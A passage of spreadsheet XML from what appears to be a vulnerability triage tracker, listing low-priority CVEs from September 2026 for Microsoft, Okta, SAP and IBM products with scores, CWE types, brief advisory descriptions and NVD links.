          <t>CWE-122</t>
        </is>
      </c>
      <c r="R458" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S458" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68785</t>
        </is>
      </c>
    </row>
    <row r="459">
      <c r="A459" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B459" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C459" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78624</t>
        </is>
      </c>
      <c r="D459" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E459" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F459" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G459" s="5" t="inlineStr"/>
      <c r="H459" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I459" s="5" t="inlineStr"/>
      <c r="J459" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K459" s="5" t="inlineStr"/>
      <c r="L459" s="5" t="inlineStr"/>
      <c r="M459" s="5" t="inlineStr"/>
      <c r="N459" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O459" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P459" s="5" t="inlineStr"/>
      <c r="Q459" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R459" s="5" t="inlineStr">
        <is>
          <t>The Okta Access Gateway backup restore function does not validate the filename embedded in an encrypted backup payload. This results in writing file contents to unintended locations on the appliance filesystem.</t>
        </is>
      </c>
      <c r="S459" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78624</t>
        </is>
      </c>
    </row>
    <row r="460">
      <c r="A460" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B460" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C460" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69615</t>
        </is>
      </c>
      <c r="D460" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E460" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F460" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G460" s="5" t="inlineStr"/>
      <c r="H460" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I460" s="5" t="inlineStr"/>
      <c r="J460" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K460" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L460" s="5" t="inlineStr"/>
      <c r="M460" s="5" t="inlineStr"/>
      <c r="N460" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O460" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P460" s="5" t="inlineStr"/>
      <c r="Q460" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R460" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="S460" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69615</t>
        </is>
      </c>
    </row>
    <row r="461">
      <c r="A461" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B461" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C461" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78560</t>
        </is>
      </c>
      <c r="D461" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E461" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F461" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G461" s="5" t="inlineStr"/>
      <c r="H461" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I461" s="5" t="inlineStr"/>
      <c r="J461" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K461" s="5" t="inlineStr"/>
      <c r="L461" s="5" t="inlineStr"/>
      <c r="M461" s="5" t="inlineStr"/>
      <c r="N461" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O461" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P461" s="5" t="inlineStr"/>
      <c r="Q461" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R461"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S461" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78560</t>
        </is>
      </c>
    </row>
    <row r="462">
      <c r="A462" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B462" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C462" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18567</t>
        </is>
      </c>
      <c r="D462" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E462" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F462" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G462" s="5" t="inlineStr"/>
      <c r="H462" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I462" s="5" t="inlineStr"/>
      <c r="J462" s="5" t="inlineStr">
        <is>
          <t>ibm:db2</t>
        </is>
      </c>
      <c r="K462" s="5" t="inlineStr">
        <is>
          <t>ibm:db2_mirror_for_i</t>
        </is>
      </c>
      <c r="L462" s="5" t="inlineStr"/>
      <c r="M462" s="5" t="inlineStr"/>
      <c r="N462" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O462" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P462" s="5" t="inlineStr"/>
      <c r="Q462" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="R462" s="5" t="inlineStr">
        <is>
          <t>IBM Db2 Mirror for i 7.4, 7.5, and 7.6 could allow a local attacker to obtain information due to a race condition involving a predictable Unix domain socket path in a world-writable directory.</t>
        </is>
      </c>
      <c r="S462" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18567</t>
        </is>
      </c>
    </row>
    <row r="463">
      <c r="A463" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B463" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C463" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68849</t>
        </is>
      </c>
      <c r="D463" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E463" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F463" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G463" s="5" t="inlineStr"/>
      <c r="H463" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I463" s="5" t="inlineStr"/>
      <c r="J463" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K463" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L463" s="5" t="inlineStr"/>
      <c r="M463" s="5" t="inlineStr"/>
      <c r="N463" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O463" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P463" s="5" t="inlineStr"/>
      <c r="Q463" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R463" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Bluetooth Port Driver allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S463" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68849</t>
        </is>
      </c>
    </row>
    <row r="464">
      <c r="A464" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B464" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C464" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69832</t>
        </is>
      </c>
      <c r="D464" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E464" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F464" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G464" s="5" t="inlineStr"/>
      <c r="H464" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I464" s="5" t="inlineStr"/>
      <c r="J464" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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64" s="5" t="inlineStr"/>
      <c r="M464" s="5" t="inlineStr"/>
      <c r="N464" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O464" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P464" s="5" t="inlineStr"/>
      <c r="Q464" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="R464" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive system information to an unauthorized control sphere in Windows Win32K allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S464" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69832</t>
        </is>
      </c>
    </row>
    <row r="465">
      <c r="A465" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B465" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C465" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69853</t>
        </is>
      </c>
      <c r="D465" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E465" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F465" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G465" s="5" t="inlineStr"/>
      <c r="H465" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I465" s="5" t="inlineStr"/>
      <c r="J465" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K46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65" s="5" t="inlineStr"/>
      <c r="M465" s="5" t="inlineStr"/>
      <c r="N465" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O465" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P465" s="5" t="inlineStr"/>
      <c r="Q465" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="R465" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Windows Win32K allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S465" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69853</t>
        </is>
      </c>
    </row>
    <row r="466">
      <c r="A466" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B466" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C466" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69895</t>
        </is>
      </c>
      <c r="D466" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E466" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F466" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G466" s="5" t="inlineStr"/>
      <c r="H466" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I466" s="5" t="inlineStr"/>
      <c r="J466" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K46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66" s="5" t="inlineStr"/>
      <c r="M466" s="5" t="inlineStr"/>
      <c r="N466" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O466" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P466" s="5" t="inlineStr"/>
      <c r="Q466" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R466" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S466" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69895</t>
        </is>
      </c>
    </row>
    <row r="467">
      <c r="A467" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B467" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C467" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69548</t>
        </is>
      </c>
      <c r="D467" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="E467" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F467" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G467" s="5" t="inlineStr"/>
      <c r="H467" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I467" s="5" t="inlineStr"/>
      <c r="J467" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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67" s="5" t="inlineStr"/>
      <c r="M467" s="5" t="inlineStr"/>
      <c r="N467" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O467" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P467" s="5" t="inlineStr"/>
      <c r="Q467" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R467" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows RNDIS allows an unauthorized attacker to disclose information with a physical attack.</t>
        </is>
      </c>
      <c r="S467" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69548</t>
        </is>
      </c>
    </row>
    <row r="468">
      <c r="A468" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B468" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C468" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76959</t>
        </is>
      </c>
      <c r="D468" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="E468" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F468" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G468" s="5" t="inlineStr"/>
      <c r="H468" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I468" s="5" t="inlineStr"/>
      <c r="J468" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K468" s="5" t="inlineStr"/>
      <c r="L468" s="5" t="inlineStr"/>
      <c r="M468" s="5" t="inlineStr"/>
      <c r="N468" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O468" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P468" s="5" t="inlineStr"/>
      <c r="Q468" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="R468"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S468" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76959</t>
        </is>
      </c>
    </row>
    <row r="469">
      <c r="A469" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B469" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C469" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78452</t>
        </is>
      </c>
      <c r="D469" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="E469" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F469" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G469" s="5" t="inlineStr"/>
      <c r="H469" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I469" s="5" t="inlineStr"/>
      <c r="J469" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K469"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69" s="5" t="inlineStr"/>
      <c r="M469" s="5" t="inlineStr"/>
      <c r="N469" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O469" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P469" s="5" t="inlineStr"/>
      <c r="Q469" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R469" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Windows SCSI Class System File allows an unauthorized attacker to disclose information with a physical attack.</t>
        </is>
      </c>
      <c r="S469" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78452</t>
        </is>
      </c>
    </row>
    <row r="470">
      <c r="A470" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B470" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C470" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78508</t>
        </is>
      </c>
      <c r="D470" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="E470" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F470" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G470" s="5" t="inlineStr"/>
      <c r="H470" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I470" s="5" t="inlineStr"/>
      <c r="J470" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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0" s="5" t="inlineStr"/>
      <c r="M470" s="5" t="inlineStr"/>
      <c r="N470" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O470" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P470" s="5" t="inlineStr"/>
      <c r="Q470" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R470" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows CD-ROM Driver allows an unauthorized attacker to disclose information with a physical attack.</t>
        </is>
      </c>
      <c r="S470" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78508</t>
        </is>
      </c>
    </row>
    <row r="471">
      <c r="A471" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B471" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C471" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73019</t>
        </is>
      </c>
      <c r="D471" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E471" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F471" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G471" s="5" t="inlineStr"/>
      <c r="H471" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I471" s="5" t="inlineStr"/>
      <c r="J471" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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1" s="5" t="inlineStr"/>
      <c r="M471" s="5" t="inlineStr"/>
      <c r="N471" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O471" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P471" s="5" t="inlineStr"/>
      <c r="Q471" s="5" t="inlineStr">
        <is>
          <t>CWE-41</t>
        </is>
      </c>
      <c r="R471" s="5" t="inlineStr">
        <is>
          <t>Improper resolution of path equivalence in Windows URL Moniker allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="S471" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73019</t>
        </is>
      </c>
    </row>
    <row r="472">
      <c r="A472" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B472" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C472" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76962</t>
        </is>
      </c>
      <c r="D472" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E472" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F472" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G472" s="5" t="inlineStr"/>
      <c r="H472" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I472" s="5" t="inlineStr"/>
      <c r="J472" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K472" s="5" t="inlineStr"/>
      <c r="L472" s="5" t="inlineStr"/>
      <c r="M472" s="5" t="inlineStr"/>
      <c r="N472" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O472" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P472" s="5" t="inlineStr"/>
      <c r="Q472" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R472" s="5" t="inlineStr">
        <is>
          <t>SAP S/4HANA (Manage Bank Chains app) does not perform sufficient authorization checks within certain affected functionality. An attacker with low privileges could send specially crafted requests to delete specific entries that should not be accessible to them. This results in a low impact on availability. There is no impact on confidentiality and integrity.</t>
        </is>
      </c>
      <c r="S472" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76962</t>
        </is>
      </c>
    </row>
    <row r="473">
      <c r="A473" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B473" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C473" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76963</t>
        </is>
      </c>
      <c r="D473" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E473" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F473" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G473" s="5" t="inlineStr"/>
      <c r="H473" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I473" s="5" t="inlineStr"/>
      <c r="J473" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K473" s="5" t="inlineStr"/>
      <c r="L473" s="5" t="inlineStr"/>
      <c r="M473" s="5" t="inlineStr"/>
      <c r="N473" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O473" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P473" s="5" t="inlineStr"/>
      <c r="Q473" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R473" s="5" t="inlineStr">
        <is>
          <t>Due to a missing authorization check in Application Server ABAP of SAP NetWeaver and ABAP Platform, an authenticated attacker could gain unauthorized access to sensitive system configuration information. Successful exploitation could result in exposure of security relevant settings and internal system details, resulting in low impact on confidentiality while integrity and availability remain unaffected.</t>
        </is>
      </c>
      <c r="S473" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76963</t>
        </is>
      </c>
    </row>
    <row r="474">
      <c r="A474" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B474" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C474" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76977</t>
        </is>
      </c>
      <c r="D474" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E474" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F474" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G474" s="5" t="inlineStr"/>
      <c r="H474" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I474" s="5" t="inlineStr"/>
      <c r="J474" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K474" s="5" t="inlineStr"/>
      <c r="L474" s="5" t="inlineStr"/>
      <c r="M474" s="5" t="inlineStr"/>
      <c r="N474" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O474" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P474" s="5" t="inlineStr"/>
      <c r="Q474" s="5" t="inlineStr">
        <is>
          <t>CWE-1289</t>
        </is>
      </c>
      <c r="R474" s="5" t="inlineStr">
        <is>
          <t>SAP UI5 does not sufficiently validate the parent frame's origin against the configured allowlist. An unauthenticated attacker could host a malicious page to bypass framing restrictions. If an authenticated victim visits the attacker's page and interacts with it, the attacker could trick the victim into performing unintended actions, resulting in a low impact on integrity. There is no impact on confidentiality and availability.</t>
        </is>
      </c>
      <c r="S474" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76977</t>
        </is>
      </c>
    </row>
    <row r="475">
      <c r="A475" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B475" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C475" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78455</t>
        </is>
      </c>
      <c r="D475" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E475" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F475" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G475" s="5" t="inlineStr"/>
      <c r="H475" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I475" s="5" t="inlineStr"/>
      <c r="J475" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K47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75" s="5" t="inlineStr"/>
      <c r="M475" s="5" t="inlineStr"/>
      <c r="N475" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O475" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P475" s="5" t="inlineStr"/>
      <c r="Q475" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R475" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Xbox allows an unauthorized attacker to disclose information with a physical attack.</t>
        </is>
      </c>
      <c r="S475" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78455</t>
        </is>
      </c>
    </row>
    <row r="476">
      <c r="A476" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B476" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C476" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78516</t>
        </is>
      </c>
      <c r="D476" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E476" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F476" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G476" s="5" t="inlineStr"/>
      <c r="H476" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I476" s="5" t="inlineStr"/>
      <c r="J476" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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6" s="5" t="inlineStr"/>
      <c r="M476" s="5" t="inlineStr"/>
      <c r="N476" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O476" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P476" s="5" t="inlineStr"/>
